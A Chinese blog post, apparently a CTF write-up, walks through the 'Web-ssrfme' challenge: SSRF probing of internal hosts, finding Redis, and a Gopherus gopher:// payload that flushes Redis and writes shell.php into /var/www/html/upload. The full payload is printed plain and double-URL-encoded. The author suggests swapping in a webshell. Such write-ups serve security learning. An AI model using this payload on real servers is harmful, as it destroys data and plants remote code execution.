当前位置: 首页 > news >正文

一道ssrf题目--Web-ssrfme

news 来源:原创 2024/9/20 17:29:09

目录

环境搭建

代码分析

漏洞点寻找

渗透

使用工具构造payload

结果

​编辑 

环境搭建

使用docker拉取上面文件

root@ubuntu:~/web-ssrfme/web-ssrfme# docker-compose up -d

代码分析

首先进入题目环境,查看docker发现在8091端口下,进入后出现这么个页面

查看代码发现file和dict都被过滤了

我们再接着看代码发现如果存在info这个参数就会打印phpinfo,打印这个东西就可能会出现一些对我们有用的信息我们看一下这里有IP和中间件

漏洞点寻找

我们尝试用http访问以下phpinfo的IP,他将页面打印了两次,这里说明http协议可以使用,我们可以用http协议来探测端口

 然后我们用bp探测,发现没啥反应这个服务器好像没有啥子特别的服务,好像就开放了一个80端口

我们接着尝试,我们现在发现服务器的IP是172.21.0.3这个端口,这是在内网当中,在内网当中服务器可能会很多,并且服务器IP可能是连续的,我们可以尝试一下有没有别的服务器供我们入侵

在172.20.0.1有这么个显示

在172.20.0.2下有这么个显示

然后接着探测有什么服务,我们发现172.20.0.2的6379好像开着

渗透

我们可以传webshell到服务器上,但是这个需要我们知道物理路径,这道题目物理路径我们是不知道,需要我们猜测,我们尝试一些默认路径/var/www/html、 /usr/shart/nginx/html,发现都不行。现在我们怀疑是不是权限不够的原因,权限不够那咋个办,我们再找一下在html下有没有别的文件权限是够的。我们找个字典用bp扫描一下,发现有个upload

尝试在这个路径下 /var/www/html/upload使用gopher协议进行webshell写入

使用工具构造payload

我们这里使用gopherus这个工具来构造我们的payload

工具下载地址:GitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various servers

我这里写入的是phpinfo,当然也可以写一句话木马,注意IP地址要修改

gopher://172.20.0.2:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2420%0D%0A%0A%0A%3C%3Fphp%20phpinfo%28%29%3B%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2420%0D%0A/var/www/html/upload%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

下面我们来看一下上面的注入语句解码后是什么东西,如下图是redis的一些写入语句

 然后我们在注入的时候还需要进行一次url编码,因为在源代码中解了两次码

gopher%3a%2f%2f172.20.0.2%3a6379%2f_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252425%250D%250A%250A%250A%253C%253Fphp%2520phpinfo%2528%2529%253B%2520%253F%253E%2f%2f%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252420%250D%250A%2fvar%2fwww%2fhtml%2fupload%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

我们打开环境看一下文件是否写进去了,确实写进来了,而且后面有一堆乱码,所以我们在写入注入语句的时候后面加了注释预防干扰

结果

然后将命令换一下就可以继续渗透了

 

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • vue3 composition 模式下watch object
  • 软考架构-构件技术
  • 高亮你的文字:CSS ::selection 伪元素的魔法
  • 关于springboot对接通义千问大模型的尝试(一)
  • 【Docker】Docker 的基本概念和优势简介
  • 数据库和缓存不一致的问题及解决方案
  • Redis篇三:在Ubuntu下安装Redis
  • Python生成JMeter测试脚本----HTTP信息头管理器和用户定义的变量
  • 使用gitee存储项目
  • Java中的序列化与反序列化深度剖析
  • 分局高清视频监控及监控中心项目-技术方案(下)
  • 【Kotlin设计模式】Kotlin实现适配器模式
  • 硬件面试经典 100 题(81~90)题
  • 【Linux】第十七章 多路转接(select+poll+epoll)
  • 汽车功能安全--AutoSAR中的功能安全机制
  • 【5+】跨webview多页面 触发事件(二)
  • 【面试系列】之二:关于js原型
  • JS学习笔记——闭包
  • MD5加密原理解析及OC版原理实现
  • node.js
  • nodejs调试方法
  • spring cloud gateway 源码解析(4)跨域问题处理
  • VuePress 静态网站生成
  • 从tcpdump抓包看TCP/IP协议
  • 基于Volley网络库实现加载多种网络图片(包括GIF动态图片、圆形图片、普通图片)...
  • 技术攻略】php设计模式(一):简介及创建型模式
  • 前端面试之CSS3新特性
  • 中国人寿如何基于容器搭建金融PaaS云平台
  • 新海诚画集[秒速5センチメートル:樱花抄·春]
  • ​zookeeper集群配置与启动
  • #include
  • #QT(TCP网络编程-服务端)
  • #我与Java虚拟机的故事#连载13:有这本书就够了
  • #我与Java虚拟机的故事#连载19:等我技术变强了,我会去看你的 ​
  • (22)C#传智:复习,多态虚方法抽象类接口,静态类,String与StringBuilder,集合泛型List与Dictionary,文件类,结构与类的区别
  • (C11) 泛型表达式
  • (poj1.2.1)1970(筛选法模拟)
  • (解决办法)ASP.NET导出Excel,打开时提示“您尝试打开文件'XXX.xls'的格式与文件扩展名指定文件不一致
  • (论文阅读笔记)Network planning with deep reinforcement learning
  • (十三)Flask之特殊装饰器详解
  • (数据大屏)(Hadoop)基于SSM框架的学院校友管理系统的设计与实现+文档
  • (原)Matlab的svmtrain和svmclassify
  • (原創) 如何讓IE7按第二次Ctrl + Tab時,回到原來的索引標籤? (Web) (IE) (OS) (Windows)...
  • (转)setTimeout 和 setInterval 的区别
  • (自适应手机端)响应式新闻博客知识类pbootcms网站模板 自媒体运营博客网站源码下载
  • . Flume面试题
  • .NET delegate 委托 、 Event 事件,接口回调
  • .NET Micro Framework 4.2 beta 源码探析
  • .net 受管制代码
  • .NETCORE 开发登录接口MFA谷歌多因子身份验证
  • .net通用权限框架B/S (三)--MODEL层(2)
  • @vueup/vue-quill使用quill-better-table报moduleClass is not a constructor
  • [ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
  • [AIGC] Nacos:一个简单 yet powerful 的配置中心和服务注册中心
  • [BT]小迪安全2023学习笔记(第15天:PHP开发-登录验证)